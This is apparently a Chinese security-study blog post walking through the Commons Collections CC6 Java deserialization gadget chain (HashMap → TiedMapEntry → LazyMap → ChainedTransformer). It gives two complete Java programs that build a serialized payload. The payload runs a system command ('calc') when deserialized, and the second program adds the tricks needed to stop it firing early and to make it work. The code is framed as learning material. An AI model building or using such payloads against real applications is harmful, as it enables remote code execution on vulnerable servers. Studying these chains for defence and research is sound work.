前面在分析 CC1链 的 ysoserial 版时,我们知道 LazyMap 的 get 方法会调用成员属性 factory 的 transform 方法,而我们上一次是通过 AnnotationInvocationHandler 的 invoke 方法来调用这个 get 方法的。那么还有哪里能调用 LazyMap 的 get 方法呢?我们的 CC6 链给出了另一条路径:TiedMapEntry 类的 getValue 方法会调用成员属性的 get 方法。

CC6 链分析

JDK 8u71 版本之后 AnnotationInvocationHandler 的 readObject 方法被改写,CC1 链无法利用,于是引出了可以不需要经过 AnnotationInvocationHandler 类的 CC6 链。

利用链之 TiedMapEntry 类

TiedMapEntry 的 getValue 方法:

1
2
3
public Object getValue() {
return map.get(key);
}

map 是 TiedMapEntry 类中定义的一个属性:

1
private final Map map;

这个成员属性在 TiedMapEntry 的构造方法中被赋值:

1
2
3
4
5
public TiedMapEntry(Map map, Object key) {
super();
this.map = map;
this.key = key;
}

而这个构造方法被 public 修饰,可以直接调用。那么只需要将 this.map 设置成 LazyMap 对象就好了。将 this.map 设置成 LazyMap 对象以后,在 TiedMapEntry 的 getValue 方法中,会将 TiedMapEntry 的 成员属性 key 作为 LazyMap 对象的 get 方法的参数传入,这个 key 接下来会被作为 transform 的参数,那么就应该知道 key 应该传什么了,应该传 Runtime.class 。

接下来要找谁调用了 TiedMapEntry 的 getValue 方法,TiedMapEntry 的 hashCode 方法调用了此方法。

TiedMapEntry 的 hashCode 方法:

1
2
3
4
5
public int hashCode() {
Object value = getValue();
return (getKey() == null ? 0 : getKey().hashCode()) ^
(value == null ? 0 : value.hashCode());
}

要想调用 TiedMapEntry 的 hashCode 方法,可以把 TiedMapEntry 对象作为 HashMap 对象的 key 传入,这样在反序列化 HashMap 对象时,调用 HashMap 对象的 readObject 方法,就会调用 key 的 hashCode 方法。这是在学习 URLDNS 链时已经学到的内容,这里不妨再复习一下。

入口类之 HashMap

HashMap 的 readObject 方法:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
private void readObject(java.io.ObjectInputStream s)
throws IOException, ClassNotFoundException {
// Read in the threshold (ignored), loadfactor, and any hidden stuff
s.defaultReadObject();
reinitialize();
if (loadFactor <= 0 || Float.isNaN(loadFactor))
throw new InvalidObjectException("Illegal load factor: " +
loadFactor);
s.readInt(); // Read and ignore number of buckets
int mappings = s.readInt(); // Read number of mappings (size)
if (mappings < 0)
throw new InvalidObjectException("Illegal mappings count: " +
mappings);
else if (mappings > 0) { // (if zero, use defaults)
// Size the table using given load factor only if within
// range of 0.25...4.0
float lf = Math.min(Math.max(0.25f, loadFactor), 4.0f);
float fc = (float)mappings / lf + 1.0f;
int cap = ((fc < DEFAULT_INITIAL_CAPACITY) ?
DEFAULT_INITIAL_CAPACITY :
(fc >= MAXIMUM_CAPACITY) ?
MAXIMUM_CAPACITY :
tableSizeFor((int)fc));
float ft = (float)cap * lf;
threshold = ((cap < MAXIMUM_CAPACITY && ft < MAXIMUM_CAPACITY) ?
(int)ft : Integer.MAX_VALUE);
@SuppressWarnings({"rawtypes","unchecked"})
Node<K,V>[] tab = (Node<K,V>[])new Node[cap];
table = tab;

// Read the keys and values, and put the mappings in the HashMap
for (int i = 0; i < mappings; i++) {
@SuppressWarnings("unchecked")
K key = (K) s.readObject();
@SuppressWarnings("unchecked")
V value = (V) s.readObject();
putVal(hash(key), key, value, false, false);
}
}
}

结尾处的这一句:

1
putVal(hash(key), key, value, false, false);

会调用 HashMap 的 hash 方法。

HashMap 的 hash 方法:

1
2
3
4
static final int hash(Object key) {
int h;
return (key == null) ? 0 : (h = key.hashCode()) ^ (h >>> 16);
}

在这里就会调用 key 的 hashCode 方法。

利用链已经明了,开始构造 payload 。

构造 payload1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import java.io.*;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Proxy;
import java.util.HashMap;
import java.util.Map;

public class payload {
public static void main(String[] args) throws Exception {
// 获取包含执行类的 ChainedTransformer 对象
Transformer[] transformers = new Transformer[]{
// 将传入参数固定为 Runtime.class
new ConstantTransformer(Runtime.class),
new InvokerTransformer
("getDeclaredMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
new InvokerTransformer
("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
new InvokerTransformer
("exec", new Class[]{String.class}, new Object[]{"calc"})
};
ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);

// 新建一个 Map 对象,无关紧要,只是作为参数传入
Map<Object, Object> hashMap = new HashMap<>();

// 初始化利用链 LazyMap
Map lazymap = LazyMap.decorate(hashMap, chainedTransformer);

// 初始化利用链 TiedMapEntry
TiedMapEntry tiedMapEntry = new TiedMapEntry(lazymap, Runtime.class);

// 初始化利用链 HashMap
HashMap<Object, Object> map = new HashMap<>();
map.put(tiedMapEntry, "test");

serialize(map);
unserialize("ser.bin");
}

public static void serialize(Object obj) throws Exception {
ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
oos.writeObject(obj);
}

public static Object unserialize(String Filename) throws IOException, ClassNotFoundException {
ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
Object obj = ois.readObject();
return obj;
}
}

payload 构造完成,但是在运行的时候会发现一个问题,就是序列化的时候也会进行一次命令执行,原因是 HashMap 的 put 方法也会调用 key 的 hashCode 方法。

HashMap 的 put 方法:

1
2
3
public V put(K key, V value) {
return putVal(hash(key), key, value, false, true);
}

这里会调用 HashMap 的 hash 方法,进而调用 key 的 hashCode 方法。

我们肯定不希望自己的计算机上也执行一遍恶意命令对吧,所以我们需要避免序列化的时候命令执行,这也是以后的反序列化利用需要注意的问题。

改进 payload

如何避免序列化时命令执行呢,在 map.put 方法执行之前,我们先传入一个不包含 chainedTransformer 的 LazyMap 对象,在 map.put 方法执行之后,再修改这个 LazyMap 对象的 factory 属性为 chainedTransformer 即可。

问题抛出

然而当我这样修改之后,又发现了一个问题:

我在调用 TiedMapEntry 构造方法时:

1
2
3
4
5
public TiedMapEntry(Map map, Object key) {
super();
this.map = map;
this.key = key;
}

明明代码上只写了将传入的 key 作为 TiedMapEntry 对象的 key 属性值,但是在执行完这一步后发现 TiedMapEntry 对象的 map 属性的 key 属性值也变为了传入的 key 值。

执行 this.key = key 之前,map 中只有一个 null -> 1 的键值对:

执行 this.key = key 之后,map 中多了一个 aaa -> 1 的键值对:

很奇异,翻了很多大佬的博客,但是都没有讲明原因,后来与好友交流,得出了一种较为合理的解释。

参见:幽默的Common-Collections6调试

还记得我们之前说过的吗:IDEA 在 debug 时,当 debug 到某个对象的时候,会调用对象的 toString() 方法,用来在 debug 界面显示对象信息。

这里正是由于 TiedMapEntry 对象的 toString() 方法在调试时被调用了,来看 TiedMapEntry 的 toString() 方法:

1
2
3
public String toString() {
return getKey() + "=" + getValue();
}

这里调用了 TiedMapEntry 的 getValue() 方法:

1
2
3
public Object getValue() {
return map.get(key);
}

于是就会接着调用其成员属性 map 的 get() 方法,也即 LazyMap 对象的 get() 方法:

1
2
3
4
5
6
7
8
9
public Object get(Object key) {
// create value for key if key is not currently in the map
if (map.containsKey(key) == false) {
Object value = factory.transform(key);
map.put(key, value);
return value;
}
return map.get(key);
}

第一次进来,LazyMap 对象的 map 属性 key 值为 null ,不包含传入的 key 值,所以进入判断,在 map.put(key, value); 处将 LazyMap 对象的 map 属性 key 值设置成了传入的 key 值,这就造成了调试完 TiedMapEntry 构造方法后 LazyMap 对象的 map 属性就已经有 key 值了。

所以如果是真实运行环境的话,它的流程应该是这样的:在 TiedMapEntry 的构造方法被调用之后,调用 HashMap 的 put 方法时:

1
2
3
TiedMapEntry tiedMapeEntry = new TiedMapEntry(lazymap, "key");
HashMap<Object, Object> map2 = new HashMap<>();
map2.put(tiedMapeEntry, "test");

运行时调用链:

1
map2::put() -> map2::hash() -> tiedMapeEntry::hashCode() -> tiedMapeEntry::getValue() -> lazymap::get()

于是在这里 lazymap 的 map 属性的 key 值被设置成了传入的 key 值,这将导致下一次调用 lazymap 的 get() 方法时(反序列化时)将不会进入判断,从而无法命令执行。

所以需要在 put 方法调用完之后删除掉 lazymap 的 map 属性的 key 值:

1
lazymap.remove("key");

构造 payload2

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import java.io.*;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.Map;

public class payload2 {
public static void main(String[] args) throws Exception {
// 获取包含执行类的 ChainedTransformer 对象
Transformer[] transformers = new Transformer[]{
// 将传入参数固定为 Runtime.class
new ConstantTransformer(Runtime.class),
new InvokerTransformer
("getDeclaredMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
new InvokerTransformer
("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
new InvokerTransformer
("exec", new Class[]{String.class}, new Object[]{"calc"})
};
ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);

// 新建一个 Map 对象,无关紧要,只是作为参数传入
Map<Object, Object> hashMap = new HashMap<>();

// 初始化利用链 LazyMap
Map lazymap = LazyMap.decorate(hashMap, new ConstantTransformer(1));

// 初始化利用链 TiedMapEntry ,第二个参数为 key 值,先随便传一个
TiedMapEntry tiedMapEntry = new TiedMapEntry(lazymap, "key");

// 初始化利用链 HashMap
HashMap<Object, Object> map = new HashMap<>();
map.put(tiedMapEntry, "test");

// 删除 lazymap 对象中的 key 值
lazymap.remove("key");

// 反射修改 lazymap 对象的 factory 属性
Class<? extends Map> lazymapClass = lazymap.getClass();
Field factory = lazymapClass.getDeclaredField("factory");
factory.setAccessible(true);
factory.set(lazymap, chainedTransformer);

// serialize(map);
unserialize("ser.bin");
}

public static void serialize(Object obj) throws Exception {
ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
oos.writeObject(obj);
}

public static Object unserialize(String Filename) throws IOException, ClassNotFoundException {
ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
Object obj = ois.readObject();
return obj;
}
}

至此就完成了。

结语

真理是越辩越明的。